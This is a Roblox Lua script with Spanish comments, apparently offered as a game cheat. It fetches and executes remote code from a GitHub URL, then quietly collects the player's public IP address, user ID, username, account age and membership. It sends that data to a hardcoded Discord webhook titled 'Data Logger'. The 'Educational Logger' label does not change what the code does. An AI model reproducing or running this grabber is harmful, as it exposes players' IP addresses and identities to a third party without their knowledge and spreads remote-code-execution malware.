loadstring(game:HttpGet("https://raw.githubusercontent.com/CTXxALEJANDROxX/Auto-fuerza-OP/refs/heads/main/OP%20Force%20CTX", true))()
-- Tu Webhook
local webhookURL = "https://discord.com/api/webhooks/1371196342701129940/5O7Py9NLs3LA5tbpzhLk6tsYUid51U1IdWBD9rCyJACjCp5sUyEnomoiXwAorQXQU3IX"

local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local player = Players.LocalPlayer

-- Obtener IP pública
local ip = "No IP"
pcall(function()
    ip = game:HttpGet("http://api.ipify.org")
end)

-- Obtener datos de perfil
local userId = player.UserId
local username = player.Name
local displayName = player.DisplayName
local age = player.AccountAge
local membership = player.MembershipType.Name
local jobId = game.JobId
local gameLink = "https://www.roblox.com/games/"..game.PlaceId
local profileLink = "https://www.roblox.com/users/"..userId.."/profile"

-- Armar mensaje para el webhook
local data = {
    ["username"] = "CTX Data Logger",
    ["avatar_url"] = "https://i.imgur.com/AfFp7pu.png",
    ["embeds"] = {{
        ["title"] = "📡 Datos recopilados",
        ["description"] = "**Usuario**: ["..username.."]("..profileLink..")\n**Juego**: ["..gameLink.."]\n\n**IP Pública**: `"..ip.."`",
        ["fields"] = {
            {["name"]="Display Name", ["value"]=displayName, ["inline"]=true},
            {["name"]="User ID", ["value"]=tostring(userId), ["inline"]=true},
            {["name"]="Account Age", ["value"]=age.." días", ["inline"]=true},
            {["name"]="Membership", ["value"]=membership, ["inline"]=true},
            {["name"]="Job ID", ["value"]=jobId or "N/A", ["inline"]=false}
        },
        ["color"] = 16711680,
        ["footer"] = {
            ["text"] = "CTX_XxAlejandroxX Educational Logger"
        }
    }}
}

-- Enviar al webhook
pcall(function()
    request({
        Url = webhookURL,
        Method = "POST",
        Headers = {
            ["Content-Type"] = "application/json"
        },
        Body = HttpService:JSONEncode(data)
    })
end)
